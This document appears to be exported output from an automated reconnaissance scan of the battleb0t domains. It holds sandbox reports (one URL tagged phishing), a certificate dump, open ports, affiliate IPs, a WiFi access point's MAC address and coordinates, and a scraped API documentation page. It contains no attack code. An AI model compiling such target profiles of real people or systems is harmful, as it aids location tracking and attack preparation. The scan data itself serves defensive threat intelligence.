| 2023-05-12 02:51:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://deepkha.github.io/Tailwind-signup/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d60_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d60_IESQMMUTEX_0_303"\n "IsoScope_d60_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_d60_IE_EarlyTabStart_0xd30_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3424"\n "IsoScope_d60_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d60_ConnHashTable<3424>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.26.9.91:443"\n "157.240.22.35:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.tailwindcss.com"\n "deepkha.github.io"\n "facebook.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "https://twitter.com/browserslist" (Indicator: "dir "; File: "3.3_1_.js")\n Found string "<link rel="icon" type="image/png" href="https://facebook.com/favicon.ico">" (Indicator: "dir "; File: "urlref_httpsdeepkha.github.ioTailwind-signup")\n Found string "facebook.com" (Indicator: "dir "; File: "PCAP")\n Found string "GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: facebook.comDNT: 1Connection: Keep-Alive" (Indicator: "dir "; File: "SSL")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarEAB.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB8C.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"R_1_.png" has type "PNG image data 1722 x 362 8-bit/color RGBA non-interlaced" and extension "png"\n "favicon_4_.png" has type "MS Windows icon resource - 2 icons 16x16 32 bits/pixel 32x32 32 bits/pixel" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1560', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1560', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabEAA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabEAA.tmp]- [targetUID: 00000000-00002236]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002236]\n "CabB8B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB8B.tmp]- [targetUID: 00000000-00002236]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "3.3_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "TarEAB.tmp" has type "data"- Location: [%TEMP%\\TarEAB.tmp]- [targetUID: 00000000-00002236]\n "R_1_.png" has type "PNG image data 1722 x 362 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "CabEAA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabEAA.tmp]- [targetUID: 00000000-00002236]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003424]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF78A8BEEAF387A003.TMP" has type "data"- Location: [%TEMP%\\~DF78A8BEEAF387A003.TMP]- [targetUID: 00000000-00003424]\n "~DFBE6148C01EF718F9.TMP" has type "data"- Location: [%TEMP%\\~DFBE6148C01EF718F9.TMP]- [targetUID: 00000000-00003424]\n "~DF6A767D77C862A498.TMP" has type "data"- Location: [%TEMP%\\~DF6A767D77C862A498.TMP]- [targetUID: 00000000-00003424]\n "~DF3A1E273B2E6AD4CC.TMP" has type "data"- Location: [%TEMP%\\~DF3A1E273B2E6AD4CC.TMP]- [targetUID: 00000000-00003424]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003424]\n "RecoveryStore._52F6E2B5-EEAF-11ED-B3EC-08002708D529_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_4_.png" has type "MS Windows icon resource - 2 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "_52F6E2B7-EEAF-11ED-B3EC-08002708D529_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_5C0E27F4-EEAF-11ED-B3EC-08002708D529_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "urlref_httpsdeepkha.github.ioTailwind-signup" has type "HTML document ASCII text"- [targetUID: N/A]\n "5G00TCG4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5G00TCG4.txt]- [targetUID: 00000000-00003424]\n "WU2AP75U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WU2AP75U.txt]- [targetUID: 00000000-00003424]\n "XHRTG3Z7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XHRTG3Z7.txt]- [targetUID: 00000000-00002236]\n "D4D4P3AW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D4D4P3AW.txt]- [targetUID: 00000000-00003424]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002236]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "THQVIILB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\THQVIILB.txt]- [targetUID: 00000000-00003424]\n "2ESYMYET.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2ESYMYET.txt]- [targetUID: 00000000-00003424]\n "GUPBTX7D.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GUPBTX7D.txt]- [targetUID: 00000000-00003424]\n "UL0I03E7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UL0I03E7.txt]- [targetUID: 00000000-00003424]\n "TarB8C.tmp" has type "data"- Location: [%TEMP%\\TarB8C.tmp]- [targetUID: 00000000-00002236]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002236]\n "CabB8B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB8B.tmp]- [targetUID: 00000000-00002236]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixe | 185.199.108.153 |
| 2023-05-12 02:44:37 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:82:cb:77:ee:0a:02:15:cc:55:bf:00:98:6f:a8:
3f:b2:14:d4:9c:d2:64:fd:99:e1:d8:26:89:b8:f1:
dc:22:d0:26:9d:8e:a5:23:7c:46:6d:03:ff:6a:e6:
a2:08:ce:de:84:74:8f:ae:3e:dc:7e:26:40:72:7b:
57:ec:43:06:6a:71:6c:fc:31:f4:5e:75:d1:19:14:
5e:39:a9:c9:25:dc:c7:ab:fb:78:13:e9:b6:dd:4e:
22:f5:46:61:9b:4d:92:18:51:63:9f:47:d1:e0:56:
d2:dd:ee:e2:20:b3:7b:38:70:5e:c4:ce:34:85:6e:
20:54:d9:a0:fd:9c:5b:f3:2b:f0:71:40:e4:40:4b:
1e:0f:24:1b:6d:0c:b5:2f:db:ff:c9:99:df:c5:b7:
e3:7b:82:94:fd:3b:73:58:54:64:ee:2f:77:1b:b4:
c2:f6:38:26:30:8a:32:cc:d3:34:07:56:0c:a8:1d:
b3:55:51:77:90:73:0f:96:7f:80:56:ed:10:db:b0:
4f:75:85:22:ed:37:00:ed:d3:cd:b1:63:f5:f1:51:
be:1d:fc:12:12:48:53:55:50:e7:d9:8d:97:f2:49:
cd:d8:c7:68:76:42:1f:19:5e:47:61:6c:1c:99:ed:
d8:16:c4:32:36:77:d5:1b:79:9e:1e:4e:47:15:7c:
27:6f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:EC:9F:C5:4F:26:93:D3:4A:02:0B:79:BA:BB:F3:33:18:F7:3E:35
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
95:2c:18:1f:d0:91:73:33:88:ab:4e:68:d6:e3:58:9c:45:64:
b3:8a:0d:c0:05:28:dd:e1:2b:f4:06:90:e5:1f:5e:3c:9c:82:
f8:42:f9:9c:fc:f0:39:70:2a:ec:b3:e8:e8:27:a3:e2:22:80:
9f:b5:25:f6:b8:88:47:5f:86:6d:fa:80:87:2b:27:3e:0f:10:
6e:32:3f:e2:3c:74:e0:3c:4f:db:80:e5:a0:7b:df:70:24:e5:
0b:57:3d:66:c3:68:d9:cb:10:13:bf:3d:4b:9b:bd:e4:38:dc:
16:3b:ab:a4:bb:05:4c:21:58:ec:56:01:d3:cd:f7:e4:52:ad:
1c:0c:0e:45:9d:25:b3:ee:43:f3:93:10:64:3c:d1:8d:ef:4c:
a1:a0:46:a0:9c:7a:71:16:74:1d:79:35:f7:b7:75:a9:5d:1a:
70:92:2b:c8:d4:0a:a7:04:cf:3a:2e:08:b5:53:9c:fd:91:52:
6d:bc:96:2f:53:07:7f:1a:15:71:f1:e4:9c:95:b8:03:cb:17:
25:b8:bd:2e:3d:91:c6:72:cb:50:7f:bb:42:cd:87:4e:3f:af:
01:27:cd:29:c4:cc:43:33:bb:f8:a1:ac:9f:c7:0b:d7:f6:39:
18:d3:6f:bb:a0:79:75:5a:d1:c9:35:44:91:1c:7a:a8:9d:4d:
fb:9f:95:2e
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:5E:6E:39) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:52:30 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 24, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://portal.succeedms.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6912:304:WilStaging_02"\n "SM0:6912:120:WilError_01"\n "Local\\SM0:6912:120:WilError_01"\n "SM0:6912:304:WilStaging_02"\n "InternetShortcutMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"205.209.56.185:443"\n "138.91.254.96:443"\n "69.16.175.42:443"\n "142.250.189.234:443"\n "185.199.108.153:443"\n "205.234.175.175:443"\n "104.17.25.14:443"\n "151.101.65.195:443"\n "104.18.11.207:443"\n "142.250.189.195:443"\n "20.99.186.246:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "angular-ui.github.io"\n "api.edgeoffer.microsoft.com"\n "arc.msn.com"\n "cdn.ckeditor.com"\n "cdnjs.cloudflare.com"\n "code.angularjs.org"\n "code.jquery.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "maxcdn.bootstrapcdn.com"\n "portal.succeedms.com"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsportal.succeedms.com" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\shopping.js]- [targetUID: 00000000-00006260]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006260]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\edge_driver.js]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006260]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006260]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\product_page.js]- [targetUID: 00000000-00006260]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006260]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\auto_open_controller.js]- [targetUID: 00000000-00006260]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00006260]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00006260]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006260]\n "e2c201dc-abb6-4501-b956-b4b9ffeb3b35.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 96705"- Location: [%TEMP%\\e2c201dc-abb6-4501-b956-b4b9ffeb3b35.tmp]- [targetUID: 00000000-00006260]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006260]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\shoppingfre.js]- [targetUID: 00000000-00006260]\n "000014.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000014.ldb]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006260]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\6260_1023497038\\edge_autofill_field_data.json]- [targetUID: 00000000-00006260]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006912]\n "f_0004c8" has type "gzip compressed data from Unix original size modulo 2^32 485056"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c8]- [targetUID: 00000000-00004156]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006260]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00006260]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\6260_470104041\\safety_tips.pb]- [targetUID: 00000000-00006260]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006260]\n "sslkey.txt" has type "data"- Location: [%TEMP%\\sslkey.txt]- [targetUID: 00000000-00006260]\n "Tabs_13327794733834989" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13327794733834989]- [targetUID: 00000000-00006260]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\6260_159770579\\deny_domains.list]- [targetUID: 00000000-00006260]\n "4d0843e6-a90a-4206-b16a-5bf96317da49.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\4d0843e6-a90a-4206-b16a-5bf96317da49.tmp]- [targetUID: 00000000-00006260]\n "f_0004c6" has type "gzip compressed data from Unix original size modulo 2^32 282766"- [targetUID: N/A]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "85ebca81-6b72-4b70-9587-353468916cff.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\85ebca81-6b72-4b70-9587-353468916cff.tmp]- [targetUID: 00000000-00006260]\n "1f491eff-7d04-4310-ba68-455db03d3064.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\1f491eff-7d04-4310-ba68-455db03d3064.tmp]- [targetUID: 00000000-00006260]\n "63072495-c7f1-4fa2-8e13-281e75a5446c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\63072495-c7f1-4fa2-8e13-281e75a5446c.tmp]- [targetUID: 00000000-00006260]\n "3ca9b7b0-520b-4866-a772-da63c52ee9e3.tmp" has type "UTF-8 Unicode text with very long lines | 185.199.108.153 |
| 2023-05-12 03:32:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.14:8443 | 188.114.97.0/24 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Commons-based peer production - Commons-based peer production is a term coined by Harvard Law School professor Yochai Benkler. It describes a model of socio-economic production in which large numbers of people work cooperatively; usually over the Internet. | battleb0t.github.io |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.78 | 34.74.170.74 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:56:27 | Hash | No | Hash Extractor | 0 | 0 | 3 | 0 | None | [MD5] 02ca825e4901e74c2c2d6f8e59341325 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
